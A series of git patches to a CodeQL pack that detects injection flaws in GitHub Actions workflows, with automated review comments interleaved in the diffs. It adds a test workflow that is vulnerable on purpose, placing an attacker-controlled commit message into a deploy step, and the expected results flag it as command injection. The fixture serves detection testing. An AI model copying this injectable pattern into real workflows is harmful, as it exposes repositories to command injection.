Fri, 12 Apr 2024 13:08:41 +0200 Subject: [PATCH 0173/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5b3952ce96..ff8e02aa63e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.10 +version: 0.0.11 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7c1cc78df4a..c769ea06d0b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.10 +version: 0.0.11 groups: - actions - queries From 9ecda65e32762519d4c2d89b309cb8a6532b7073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 16 Apr 2024 11:41:53 +0200 Subject: [PATCH 0174/1267] Update Priv workflow definition --- ql/lib/codeql-pack.lock.yml | 16 ---- ql/lib/codeql/actions/Ast.qll | 13 ++- .../.github/workflows/documentation.yml | 87 +++++++++++++++++++ .../CWE-078/CommandInjection.expected | 1 + .../PrivilegedCommandInjection.expected | 2 + .../CWE-094/.github/workflows/inter-job4.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 2 + .../CWE-094/PrivilegedCodeInjection.expected | 2 - 8 files changed, 102 insertions(+), 23 deletions(-) delete mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c..00000000000 --- a/ql/lib/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index edee4d03eb4..7e1bfdee589 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -208,19 +208,21 @@ class Workflow extends AstNode instanceof WorkflowImpl { predicate hasSingleTrigger(string trigger) { this.getATriggerEvent() = trigger and - count(string t | this.getATriggerEvent() = t | t) = 1 + count(this.getATriggerEvent()) = 1 } predicate isPrivileged() { // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" and + this.getPermissions().getAPermission() = "write" + or // The Workflow accesses a secret exists(SecretsExpression expr | expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or // The Workflow is triggered by an event other than `pull_request` - not this.hasSingleTrigger("pull_request") + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -228,8 +230,11 @@ class Workflow extends AstNode instanceof WorkflowImpl { exists(ExternalJob call, Workflow caller | call.getCallee() = this.getLocation().getFile().getRelativePath() and caller = call.getWorkflow() and - not caller.hasSingleTrigger("pull_request") + caller.isPrivileged() ) + or + // The Workflow has multiple triggers so at least one is ont "pull_request" + count(this.getATriggerEvent()) > 1 } } diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml new file mode 100644 index 00000000000..46ffbce9628 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml 
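Review bot: In `Workflow.isPrivileged()` in `Ast.qll`, the single-trigger disjunct now excludes `workflow_call` as well as `pull_request`, so a reusable workflow with no write permission and no non-`GITHUB_TOKEN` secret becomes privileged only through the caller check further down. Callers that live outside the analysed database are invisible to that check, so such workflows would presumably stop being reported by the Privileged* queries; if that trade-off is intended it should be stated in the predicate's documentation. The comment above the disjunct is stale after this change; `// The Workflow has a single trigger that is neither pull_request nor workflow_call` matches the new condition. The class body starts before this hunk and part of the caller check lies between the two hunks, so this reading is partial.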
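Review bot: The new last disjunct in `isPrivileged()`, `count(this.getATriggerEvent()) > 1`, marks every workflow with two or more triggers as privileged, including a combination such as `pull_request` plus `workflow_call`, which the earlier disjuncts treat as needing a privileged caller. That is broader than the comment's reasoning and will likely add false positives to the Privileged* results. If the intent is "some trigger other than those two", `exists(string t | t = this.getATriggerEvent() and not t = ["pull_request", "workflow_call"])` says so directly. The comment also has a typo, `ont` for `not`. Replacing the trigger test on the caller with `caller.isPrivileged()` makes the predicate recursive through callers, which deserves a one-line comment.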
@@ -0,0 +1,87 @@
+name: Documentation
+
+on:
+ workflow_dispatch:
+ workflow_call:
+
+jobs:
+ parse_commit_info:
+ runs-on: ubuntu-latest
+ outputs:
+ can_deploy: ${{ steps.decide.outputs.can_deploy }}
+ deploy_to: ${{ steps.decide.outputs.deploy_to }}
+
+ steps:
+ - name: Checkout Code
+ uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Copy build utils
+ run: |
+ cp -r .github/utils ../utils
+
+ - name: Decide Whether to Build and/or Release
+ id: decide
+ run: |
+ set -xe
+ CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation)
+ DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation)
+
+ echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT
+ echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT
+ echo github.ref ${{ github.ref }}
+
+ build-documentation:
+ runs-on: ubuntu-latest
+ needs: parse_commit_info
+
+ strategy:
+ matrix:
+ python-version: [3.11]
+
+ steps:
+ - name: Checkout Code
+ uses: actions/checkout@v4
+
+ - name: Setup Python
+ uses: actions/setup-python@v5
+ with:
+ python-version: ${{ matrix.python-version }}
+
+ - name: Install Quarto
+ uses: quarto-dev/quarto-actions/setup@v2
+ with:
+ version: pre-release
+
+ - name: Install Package
+ shell: bash
+ run: |
+ make doc-deps
+
+ - name: Environment Information
+ shell: bash
+ run: |
+ ls -la
+ ls -la doc
+ pip list
+
+ - name: Build docs
+ shell: bash
+ run: |
+ pushd doc; make doc; popd
+
+ - name: Environment Information
+ shell: bash
+ run: |
+ ls -la doc
+ cat doc/_variables.yml
+ ls -la doc/reference
+
+ - name: Deploy to Documentation to a Branch
+ uses: JamesIves/github-pages-deploy-action@v4
+ if: contains(needs.parse_commit_info.outputs.can_deploy, 'true')
+ with:
+ folder: doc/_site
+ branch: ${{ needs.parse_commit_info.outputs.deploy_to }}
+ commit-message: ${{ github.event.head_commit.message }}
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index 99ebb1edc05..ebbf2f7cf0b 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -1,5 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 13d146a2570..8829557368b 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected 
@@ -1,6 +1,8 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index aad2d171c1a..b964bb78dac 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index c9f814139a0..f242e0e9e68 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -234,4 +234,6 @@ nodes subpaths #select | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 35b27172db6..ec9a5e5238a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -236,8 +236,6 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From d1a4d18fca36aab804ce643d14db1c246c34c7c3 Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Tue, 16 Apr 2024 21:33:50 +0200 Subject: [PATCH 0175/1267] Add composite actions summaries and sources --- .../apache_incubator-kie-tools.model.yml | 6 ++++++ .../aws-powertools_powertools-lambda-python.model.yml | 6 ++++++ .../composite-actions/drawpile_drawpile.model.yml | 7 +++++++ .../elastic_apm-server.model copy.yml | 7 +++++++ .../composite-actions/flagsmith_flagsmith.model.yml | 6 ++++++ .../googlecloudplatform_dataflowtemplates.model.yml | 11 +++++++++++ .../composite-actions/hashicorp_vault.model.yml | 8 +++++++- .../jhipster_generator-jhipster.model.yml | 7 ++++++- .../composite-actions/linkerd_linkerd2.model.yml | 9 ++++++++- .../generated/composite-actions/novuhq_novu.model.yml | 7 ++++++- .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++- .../generated/composite-actions/saltstack_salt.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- 13 files changed, 88 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml create mode 100644 ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 00000000000..37f3efbeded --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
new file mode 100644
index 00000000000..6dffbff40d3
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml
new file mode 100644
index 00000000000..63085c045d0
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"]
+ - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml
new file mode 100644
index 00000000000..023abac3631
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml
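Review bot: `apache_incubator-kie-tools.model.yml` declares `extensible: sinkModel`, but its only row, `["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"]`, has the six-column input-to-output shape that the sibling files in this commit (aws-powertools, drawpile) register under `summaryModel`. Sink rows elsewhere on the page have five columns ending in a sink kind, so this row will probably be rejected or ignored and the taint step through the action's output will not be modelled. Change the line to `extensible: summaryModel`. The file also lacks a trailing newline.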
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"]
+ - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml
new file mode 100644
index 00000000000..37e1d0d67a5
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
new file mode 100644
index 00000000000..ab1cac6b691
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
index bcd6e0eda31..ba213f0363b 100644
--- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
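Review bot: The elastic model is added under the file name `elastic_apm-server.model copy.yml`; the ` copy` and the embedded space look like a leftover from duplicating another model file. Every other model file in this commit ends in `.model.yml` with no space, so renaming it to `elastic_apm-server.model.yml` keeps the directory consistent. The pack's data-extension pattern is not visible on this page, so it is worth confirming the file is picked up at all under its current name.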
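Review bot: `googlecloudplatform_dataflowtemplates.model.yml` is named for `dataflowtemplates`, but both rows model `googlecloudplatform/magic-modules`, so either the file name or the repository column is wrong. If the rows belong to magic-modules the file should be named for it; if not, uses of the dataflowtemplates action get no source or sink from this file. The sink row also spells the argument `inputs.repo`, while the manual rows in this commit and the SonarCloud sink use `input.`; confirm that both spellings are accepted by the model predicates.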
@@ -4,4 +4,10 @@ extensions:
 extensible: sinkModel
 data:
 - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"]
- - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"]
+ - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
index 6dd3ac94306..f1b5e6df222 100644
--- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
+++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
@@ -19,4 +19,9 @@ extensions:
 - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"]
 - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"]
 - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"]
- - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"]
\ No newline at end of file
+ - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
index 234f13b7387..e86f7432a48 100644
--- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
+++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
@@ -6,4 +6,11 @@ extensions:
 - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"]
 - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"]
 - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"]
- - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"]
\ No newline at end of file
+ - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"]
+ - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"]
+ - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
index f305e2a37b3..48203004ed5 100644
--- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
+++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"]
\ No newline at end of file
+ - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
index 8b45d92a5e0..3122d89f28f 100644
--- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
+++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
@@ -4,4 +4,9 @@ extensions:
 extensible: sinkModel
 data:
 - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"]
- - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"]
\ No newline at end of file
+ - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml
new file mode 100644
index 00000000000..963518a3478
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
index b56944cd0ff..21ea7ef13a9 100644
--- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
+++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"]
\ No newline at end of file
+ - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"]
From 463a7a60629eda2e88024ff90b40babdd5ae6bb8 Mon Sep 17 00:00:00 2001
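Review bot: The new file is named `saltstack_salt.yml`, without the `.model.yml` suffix that every other model file in this patch carries. If data extensions are picked up by a `*.model.yml` pattern (not visible here), its `summaryModel` row for `input.version` to `output.version` would be silently ignored. The diffstat of the following patch lists a `saltstack_salt.model.yml` in the same directory, so the row could be appended to that file instead of living in a separately named one.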
From: jorgectf Date: Tue, 16 Apr 2024 21:33:59 +0200 Subject: [PATCH 0176/1267] Add resuable workflow summaries and sources --- ...dposse_github-action-matrix-outputs-write.model.yml | 6 ++++++ .../element-hq_element-desktop.model.yml | 7 ++++++- .../reusable-workflows/envoyproxy_envoy.model.yml | 7 +++++++ .../hashgraph_hedera-services.model.yml | 7 +++++++ .../reusable-workflows/hashicorp_vault.model.yml | 8 +++++++- .../reusable-workflows/hitobito_hitobito.model.yml | 10 +++++++++- .../reusable-workflows/kubeshop_botkube.model.yml | 7 ++++++- .../reusable-workflows/neondatabase_neon.model.yml | 7 +++++++ .../reusable-workflows/puppeteer_puppeteer.model.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- .../reusable-workflows/tencent_hippy.model.yml | 8 +++++++- .../reusable-workflows/zitadel_zitadel.model.yml | 7 ++++++- 12 files changed, 80 insertions(+), 7 deletions(-) create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 00000000000..69667ce10b1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
index 849a531cd7b..9f729879723 100644
--- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
@@ -8,4 +8,9 @@ extensions:
 - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"]
 - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"]
